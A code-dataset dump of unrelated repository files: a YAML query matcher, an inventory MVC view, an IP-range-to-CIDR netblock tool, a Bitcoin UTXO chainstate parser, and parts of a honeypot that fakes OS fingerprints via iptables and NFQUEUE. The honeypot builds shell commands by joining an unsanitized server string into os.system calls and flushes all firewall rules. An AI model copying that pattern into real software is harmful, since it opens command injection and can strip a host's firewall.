from typing import Any, Generator, Tuple
def parse(docs, *queries):
result, errors = [], []
for doc in yaml.safe_load_all(docs):
for query in queries:
for query_doc in yaml.safe_load_all(query):
for ok, value in do_query(doc, query_doc):
(result if ok else errors).append(value)
return result, errors if queries and (result or errors) else [(False, queries)]
ResultGenerator = Generator[Tuple[bool, Any], NoneType, NoneType]
def matchfunc(doc, query) -> ResultGenerator:
"""
>>> [*matchfunc('abc', 'a.c')]
[(True, 'abc')]
>>> [*matchfunc('abc', 'a.')]
[(False, 'a.')]
"""
yield (True, doc) if re.fullmatch(query, doc) else (False, query)
def eq(doc, query) -> ResultGenerator:
"""
>>> [*eq(13, 13)]
[(True, 13)]
>>> [*eq('abc', 'ab.')]
[(False, 'ab.')]
"""
yield (True, doc) if query == doc else (False, query)
def dict_str(doc: dict, query: str) -> ResultGenerator:
"""
>>> [*dict_str({'key1': 'value1', 'key2': 'value2'}, 'key.')]
[(True, {'key1': 'value1'}), (True, {'key2': 'value2'})]
>>> [*dict_str({'key1': 'value1', 'key2': 'value2'}, 'key2')]
[(True, {'key2': 'value2'})]
>>> [*dict_str({'key1': 'value1', 'key2': 'value2'}, 'key3')]
[(False, 'key3')]
"""
keys = filter(lambda k: re.fullmatch(query, k), doc.keys())
found = False
for k in keys:
found = True
yield (True, {k: doc[k]})
if not found:
yield (False, query)
def dict_bool(doc: dict, query: bool) -> ResultGenerator:
"""
>>> [*dict_bool({'key1': 'value1', 'key2': 'value2'}, True)]
[(True, {'key1': 'value1'}), (True, {'key2': 'value2'})]
>>> [*dict_bool({'key1': 'value1', 'key2': 'value2'}, False)]
[(True, 'key1'), (True, 'key2')]
"""
if query:
for k, v in doc.items():
yield (True, {k: v})
else:
for k in doc.keys():
yield (True, k)
def list_str(doc: list, query: str) -> ResultGenerator:
"""
>>> [*list_str(['abc', 'def'], 'abc')]
[(True, 'abc')]
>>> [*list_str(['abc', 73], 73)]
[(True, 73)]
>>> [*list_str(['abc', {'abc': 'def'}], 'abc')]
[(True, 'abc'), (True, {'abc': 'def'})]
>>> [*list_str(['abc', {'abc': 'def'}], 'def')]
[(False, 'def')]
"""
found = False
for d in doc:
for ok, x in do_query(d, query):
if ok:
yield (True, x)
found = True
if not found:
yield (False, query)
def list_list(doc: list, query: list) -> ResultGenerator:
"""
>>> [*list_list([1,2,3], [1,2,3])]
[(True, [1]), (True, [2]), (True, [3])]
>>> [*list_list([1,2,3], [1,2,5])]
[(True, [1]), (True, [2]), (False, 5)]
>>> [*list_list([1,2,3], [5])]
[(False, 5)]
>>> [*list_list([{'key': 'value'}], ['key'])]
[(True, [{'key': 'value'}])]
"""
found = set()
for d in doc:
result = []
for i, q in enumerate(query):
for ok, x in do_query(d, q):
if ok:
found.add(i)
result.append(x)
if len(result):
yield (True, result)
yield from ((False, query[i]) for i in range(len(query)) if not i in found)
def str_list(doc: str, query: list) -> ResultGenerator:
"""
>>> [*str_list('abcde', [1, 2, 3])]
[(True, 'b'), (True, 'c'), (True, 'd')]
"""
for q in query:
yield from do_query(doc, q)
def dict_dict(doc: dict, query: dict) -> ResultGenerator:
"""
>>> [*dict_dict({'key1': 'value1', 'key2': 'value2'},
... {'key1': 'value1', 'key2': 'value3'})]
[(True, {'key1': 'value1'}), (False, {'key2': 'value3'})]
>>> [*dict_dict({'key1': {'value1': 'value2'}},
... {'key.': 'value1'})]
[(True, {'key1': {'value1': 'value2'}})]
"""
for k, v in query.items():
keys = filter(lambda kk: re.fullmatch(k, kk)
if type(k) == str else k, doc.keys())
for dk in keys:
result = {}
for ok, x in do_query(doc.get(dk), v):
if ok:
if dk in result:
yield (True, result)
result = {}
result[dk] = x
else:
yield (False, {dk: v})
if result:
yield (True, result)
def dok_list(doc, query: list):
for q in query:
yield from dok_scalar(doc, q)
def dok_scalar(doc, query):
return (ok for ok, _ in do_query(doc, query))
def dok(doc, query):
yield from (dok_list if type(query) == list else dok_scalar)(doc, query)
def list_dict(doc: list, query: dict) -> ResultGenerator:
"""
>>> [*list_dict(['one', 'two', 'three'], {True: '.*e'})]
[(True, 'one'), (True, 'three')]
>>> [*list_dict(['one', 'two', 'three'], {True: '.*e', 0: 'one'})]
[(True, 'one'), (False, {True: '.*e', 0: 'one'}), (False, {True: '.*e', 0: 'one'})]
"""
f = {}
for k, v in query.items():
if type(k) == bool:
f[k] = v
if (not k) in f:
break
for i, d in enumerate(doc):
if True in f and not all(dok(d, f[True])) or False in f and any(dok(d, f[False])):
continue
only_bool = True
for k, v in query.items():
if type(k) == bool:
continue
only_bool = False
if type(k) == int and k == i:
yield from ((True, x) for ok, x in do_query(d, v) if ok)
if only_bool:
yield (True, d)
else:
yield from do_query(d, query)
def dict_list(doc: dict, query: list) -> ResultGenerator:
"""
>>> [*dict_list({'key1': 'value1', 'key2': {'key22': 'value2'}}, ['key1', {'key2': 'key22'}, 'key3'])]
[(True, {'key1': 'value1'}), (True, {'key2': {'key22': 'value2'}}), (False, 'key3')]
>>> [*dict_list({'key1': 'value1', 'key2': {'key22': 'value2'}}, ['key.'])]
[(True, {'key1': 'value1'}), (True, {'key2': {'key22': 'value2'}})]
"""
found = set()
for i, q in enumerate(query):
for ok, x in do_query(doc, q):
if ok:
found.add(i)
yield (True, x)
else:
break
else:
continue
break
yield from ((False, query[i]) for i in range(len(query)) if not i in found)
def x_index(doc, query) -> ResultGenerator:
yield (True, doc[query]) if 0 <= query < len(doc) else (False, query)
def x_key(doc, query) -> ResultGenerator:
yield (True, {query: doc[query]}) if query in doc else (False, query)
MATCHING_RULES = {
    NoneType: {NoneType: eq},
str: {str: matchfunc, int: x_index, list: str_list},
int: {int: eq, float: eq},
float: {int: eq, float: eq},
bool: {bool: eq},
list: {str: list_str, int: x_index, float: x_index, list: list_list, dict: list_dict},
dict: {str: dict_str, int: x_key, float: x_key,
bool: dict_bool, list: dict_list, dict: dict_dict}
}
def do_query(doc, query):
rule = MATCHING_RULES.get(type(doc))
while rule is not None:
rule = rule.get(type(query))
if rule is not None:
yield from rule(doc, query)
break
else:
yield (False, query)
def print_results(results):
r, err = results
if len(r):
yaml.safe_dump(r, stream=sys.stdout, canonical=False)
return len(err) == 0
``` |
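A small usage sketch for the matcher above; the import path assumes the package layout `src/qyaml/qyaml.py` is installed as `qyaml`, and the document is illustrative:

```python
from qyaml.qyaml import parse  # assumption: package installed from src/

doc = """
key1: value1
key2: value2
"""

result, errors = parse(doc, "key.")
print(result)   # [{'key1': 'value1'}, {'key2': 'value2'}]
print(errors)   # []
```

The query `"key."` is a regular expression applied with `re.fullmatch`, so it selects both `key1` and `key2` via the `dict_str` rule.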
{
"source": "0x66you/supplyMVC-fwk",
"score": 3
} |
#### File: 0x66you/supplyMVC-fwk/view.py
```python
from model import Product
class InputView:
def enter_info(self):
print('[InputView]')
id_ = int(input('Product ID: '))
name_ = input('Name: ')
price_ = float(input('Price: '))
quantity_ = int(input("Quantity: "))
date_ = input('Date Added: ')
return id_, name_, price_, quantity_, date_
def enter_id_search(self):
id_ = int(input('[InputView]\nSearch ID number: '))
return id_
def enter_delete_alldb(self):
while True:
d = input('Delete ALL data in db?(y/n)\n')
if d.lower() == 'y':
return True
elif d.lower() == 'n':
return False
else:
                print('[error] Input invalid..')
def enter_delete_id(self):
num_ = int(input('[InputView]\nEnter ID (to be deleted): '))
return num_
def enter_update_id(self):
print('[InputView]')
id_ = int(input('Product ID(to be updated): '))
        price_in = input('Update Price (BLANK if unchanged): ')
        price_ = float(price_in) if price_in.strip() else None
        quantity_in = input('Update Quantity (BLANK if unchanged): ')
        quantity_ = int(quantity_in) if quantity_in.strip() else None
return id_, price_, quantity_
class OutputView:
def show_all(self, product_list: list):
for product in product_list:
p_ = Product(product[0], product[1], product[2], product[3], product[4])
print(p_)
def show_id_search(self, product_list: list):
print('[OutputView] Id search..')
if product_list:
p_ = Product(product_list[0][0], product_list[0][1], product_list[0][2], product_list[0][3],
product_list[0][4])
print(p_)
return True
else:
print('No Match..')
return False
def show_delete_alldb(self, confirm_):
print('[OutputView] Delete all in db..')
if confirm_:
print("Successful..")
else:
print("Delete failed (nothing in db)..")
def show_cancel_delete(self):
print('[OutputView]')
print('Delete cancelled')
def show_delete_id(self, confirm_):
print('[OutputView] Delete id in db..')
if confirm_:
print("Delete successful..")
else:
print("Id not in db..")
def show_update_id(self, confirm_):
print('[OutputView] Update id in db..')
if confirm_:
print("Update successful..")
else:
print("Update unsuccessful(no input values)")
class MenuView:
def __init__(self):
self.choice = None
self.choose_execute = 1
self.choose_search_alldb = 2
self.choose_search_id = 3
self.choose_delete_alldb = 4
self.choose_delete_id = 5
self.choose_update_id = 6
self.choose_end = 9
def nav(self):
s = '''\n[ShopMenu]
⑴ Add New
⑵ Return Everything
⑶ Search by ID
⑷ Delete Everything
⑸ Delete by ID
⑹ Update Price, Quantity
⑼ Exit
➤➤ '''
self.choice = int(input(s))
``` |
{
"source": "0x680/netblock-enumerator",
"score": 3
} |
#### File: 0x680/netblock-enumerator/range2cidr.py
```python
import netaddr
import argparse
import re
import sys
parser = argparse.ArgumentParser(
description='Takes txt file as input containing ranges in the form "0.0.0.0 - 1.1.1.1" (one per line), converts to CIDR notation, and outputs to another txt file')
parser.add_argument(
"-i",
required=True,
dest="infile",
help="Input file")
parser.add_argument(
"-o",
required=False,
dest="outfile",
help="Output file")
args = parser.parse_args()
def main():
try:
infile = args.infile
complete = []
with open(infile, 'r') as f:
lines = f.readlines()
            for line in lines:
                start_ip = line.split('-', 1)[0]
                range_end = line.split('-', 1)[1]
                end_ip = range_end.strip('\n')
                complete.append(netaddr.iprange_to_cidrs(start_ip, end_ip))
pattern = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(?:/\d{1,2}|)")
compressed = ' '.join([str(elem) for elem in complete])
result = re.findall(pattern, compressed)
return '\n'.join(result)
    except Exception:
print('Something went wrong, check input file contains ranges in the form "0.0.0.0 - 1.1.1.1", one per line.')
sys.exit(-1)
def write_output():
if args.outfile:
try:
outfile = open(args.outfile, "wt")
outfile.write(main())
outfile.close()
        except OSError as exc:
            print('Failed to write output file: {}'.format(exc))
if __name__ == '__main__':
print(main())
write_output()
``` |
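The conversion itself is a single `netaddr` call; the script mostly handles file I/O and formatting. A minimal sketch with an illustrative range:

```python
import netaddr

cidrs = netaddr.iprange_to_cidrs('192.0.2.0', '192.0.2.130')
print(cidrs)
# [IPNetwork('192.0.2.0/25'), IPNetwork('192.0.2.128/31'), IPNetwork('192.0.2.130/32')]
```

`iprange_to_cidrs` returns the minimal list of CIDR blocks covering the inclusive range, which is why a single range can expand to several networks.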
{
"source": "0x6b656e/utxo-dump",
"score": 2
} |
#### File: utxo-dump/utxo/chainstate.py
```python
import b128
import itertools
import os
import plyvel
import secp256k1
from binascii import unhexlify
from utxo.script import OP_DUP, OP_HASH160, OP_EQUAL, \
OP_EQUALVERIFY, OP_CHECKSIG
def ldb_iter(datadir):
db = plyvel.DB(os.path.join(datadir, "chainstate"), compression=None)
obf_key = db.get((unhexlify("0e00") + "obfuscate_key"))
if obf_key is not None:
pre = 'C'
obf_key = map(ord, obf_key[1:])
else:
pre = 'c'
def norm(raw):
key, value = raw
if obf_key is not None:
value = deobfuscate(obf_key, value)
return parse_ldb_value(key, value)
else:
return parse_ldb_value_old(key, value)
it = db.iterator(prefix=pre)
it = itertools.imap(norm, it)
if obf_key is None:
it = itertools.chain.from_iterable(it)
return it
def parse_ldb_value(key, raw):
tx_hash = key[1:33]
index = b128.parse(key[33:])[0]
code, raw = b128.read(raw)
height = code >> 1
amt_comp, raw = b128.read(raw)
amt = b128.decompress_amount(amt_comp)
script_code, raw = b128.read(raw)
script = decompress_raw(script_code, raw)[0]
return tx_hash, height, index, amt, script
def parse_ldb_value_old(key, raw):
tx_hash = key[1:]
version, raw = b128.read(raw)
code, raw = b128.read(raw)
first_two = (code & (2 | 4)) >> 1
n = (code >> 3) + (first_two == 0)
offset = 0
bitv = first_two
if n > 0:
while n:
n -= (ord(raw[offset]) != 0)
offset += 1
bitv = (int(raw[:offset][::-1].encode('hex'), 16) << 2) | first_two
raw = raw[offset:]
i = 0
utxos = []
while bitv > 0:
if bitv & 1:
amt_comp, raw = b128.read(raw)
amt = b128.decompress_amount(amt_comp)
script_code, raw = b128.read(raw)
script, raw = decompress_raw(script_code, raw, chomp=True)
ut = (tx_hash, None, i, amt, script)
utxos.append(ut)
bitv >>= 1
i += 1
height, raw = b128.read(raw)
assert len(raw) == 0
ret = [u[:1] + (height,) + u[2:] for u in utxos]
return ret
def decompress_raw(comp_type, raw, chomp=False):
if comp_type == 0 or comp_type == 1:
l = 20
elif comp_type >= 2 and comp_type <= 5:
l = 32
else:
l = comp_type - 6
data = raw[:l]
raw = raw[l:]
if not chomp:
assert len(raw) == 0
if comp_type == 0:
script = OP_DUP + OP_HASH160 + chr(20) + data + \
OP_EQUALVERIFY + OP_CHECKSIG
elif comp_type == 1:
script = OP_HASH160 + chr(20) + data + OP_EQUAL
elif comp_type == 2 or comp_type == 3:
script = chr(33) + chr(comp_type) + data + OP_CHECKSIG
elif comp_type == 4 or comp_type == 5:
comp_pubkey = chr(comp_type - 2) + data
pubkey = secp256k1.PublicKey(
comp_pubkey, raw=True
).serialize(compressed=False)
script = chr(65) + pubkey + OP_CHECKSIG
else:
script = data
return script, raw
def deobfuscate(key, obf):
n = len(key)
de = [chr(key[i % n] ^ ord(b)) for i, b in enumerate(obf)]
return "".join(de)
``` |
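A sketch of consuming `ldb_iter` to total the UTXO set value; note the module is Python 2 (`itertools.imap`, byte-string handling), the datadir path is illustrative, and the node must be stopped first since plyvel needs exclusive access to the LevelDB files:

```python
from utxo.chainstate import ldb_iter

total = 0
# each entry is (tx_hash, height, index, amount_in_satoshis, script)
for tx_hash, height, index, amount, script in ldb_iter("/path/to/.bitcoin"):
    total += amount
print("UTXO set total: %.8f BTC" % (total * 1e-8))
```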
{
"source": "0x6d6f7468/oschameleon",
"score": 2
} |
#### File: oschameleon/oschameleon/root_fork.py
```python
import argparse
import gevent
import gevent.monkey
import grp
import os
import pwd
from osfuscation import OSFuscation
from stack_packet.helper import flush_tables
gevent.monkey.patch_all()
def root_process():
print("Child: Running as {0}/{1}.".format(pwd.getpwuid(os.getuid())[0], grp.getgrgid(os.getgid())[0]))
data = OSFuscation.run(args.template)
print('OSFuscation return value', data)
def drop_privileges(uid_name='nobody', gid_name='nogroup'):
print("Init: Running as {0}/{1}.".format(pwd.getpwuid(os.getuid())[0], grp.getgrgid(os.getgid())[0]))
wanted_uid = pwd.getpwnam(uid_name)[2]
wanted_gid = grp.getgrnam(gid_name)[2]
pid = gevent.fork()
# print "root_fork : drop_privil : pid ",pid
if pid == 0:
# child
print ('starting child process')
child_process = gevent.spawn(root_process)
child_process.join()
print ('Child done:', child_process.successful())
flush_tables()
print ('Child exit')
else:
# parent
os.setgid(wanted_gid)
os.setuid(wanted_uid)
new_uid_name = pwd.getpwuid(os.getuid())[0]
new_gid_name = grp.getgrgid(os.getgid())[0]
print("Parent: Privileges dropped, running as {0}/{1}.".format(new_uid_name, new_gid_name))
while True:
try:
gevent.sleep(1)
print ('Parent: ping')
except KeyboardInterrupt:
break
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='OSChameleon sample usage')
parser.add_argument('--template', metavar='template.txt', type=str, help='path to the fingerprint template')
args = parser.parse_args()
if args.template is None:
args.template = "template/SIMATIC_300_PLC.txt"
try:
drop_privileges()
except KeyboardInterrupt:
flush_tables()
print ("bye")
```
#### File: oschameleon/session/log.py
```python
import logging.handlers
import os
logger = logging.getLogger("oschameleon")
class Log(object):
def __init__(self, name):
self.setup(name)
def setup(self, name):
# self.remote_logging(name, server)
self.py_logging(name)
def folder_exist(self, path):
if not os.path.exists(path):
os.makedirs(path)
def remote_logging(self, name, server):
rootLogger = logging.getLogger('')
rootLogger.setLevel(logging.DEBUG)
print(server)
socketHandler = logging.handlers.SocketHandler(server, logging.handlers.DEFAULT_TCP_LOGGING_PORT)
# don't bother with a formatter, since a socket handler sends the event as
# an unformatted pickle
rootLogger.addHandler(socketHandler)
def py_logging(self, name):
# print("log", name)
path = "/var/log/honeypot/"
self.folder_exist(path)
logFile = path + name + ".log"
logger = logging.getLogger(name)
# formatter = logging.Formatter('%(asctime)s : %(message)s')
formatter = logging.Formatter('%(message)s')
fileHandler = logging.FileHandler(logFile, mode="a")
fileHandler.setFormatter(formatter)
logger.setLevel(logging.INFO)
logger.addHandler(fileHandler)
def info(self, message):
logger.info(message)
```
#### File: oschameleon/stack_packet/helper.py
```python
import nfqueue
import os
def flush_tables():
os.system('iptables -F')
def forward_packet(nfq_packet):
# send the packet from NFQUEUE without modification
nfq_packet.set_verdict(nfqueue.NF_ACCEPT)
def drop_packet(nfq_packet):
# drop the packet from NFQUEUE
nfq_packet.set_verdict(nfqueue.NF_DROP)
def rules(server):
# print server
# allow incoming ssh
os.system('iptables -A INPUT -p tcp -s' + server + ' --dport 63712 -m state --state NEW,ESTABLISHED -j ACCEPT')
os.system('iptables -A OUTPUT -p tcp -d' + server + ' --sport 63712 -m state --state ESTABLISHED -j ACCEPT')
# allow outgoing ssh
os.system('iptables -A OUTPUT -p tcp -d' + server + ' --sport 63712 -m state --state NEW,ESTABLISHED -j ACCEPT')
os.system('iptables -A INPUT -p tcp -s' + server + ' --dport 63712 -m state --state ESTABLISHED -j ACCEPT')
# Configure NFQUEUE target
# Capture incoming packets and put in nfqueue 1
os.system('iptables -A INPUT -j NFQUEUE --queue-num 0')
``` |
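The iptables rule above diverts inbound packets to NFQUEUE number 0, where a userspace callback issues the accept/drop verdicts seen in `forward_packet` and `drop_packet`. The repo uses the legacy `nfqueue` binding; a minimal consumer sketch using the more common `NetfilterQueue` binding as an assumed alternative looks like this:

```python
from netfilterqueue import NetfilterQueue  # assumption: pip install NetfilterQueue


def handle(packet):
    """Accept everything; a real OS-fuscation hook would rewrite fields first."""
    packet.accept()


nfq = NetfilterQueue()
nfq.bind(0, handle)  # queue-num 0, matching the iptables rule above
try:
    nfq.run()
except KeyboardInterrupt:
    pass
finally:
    nfq.unbind()
```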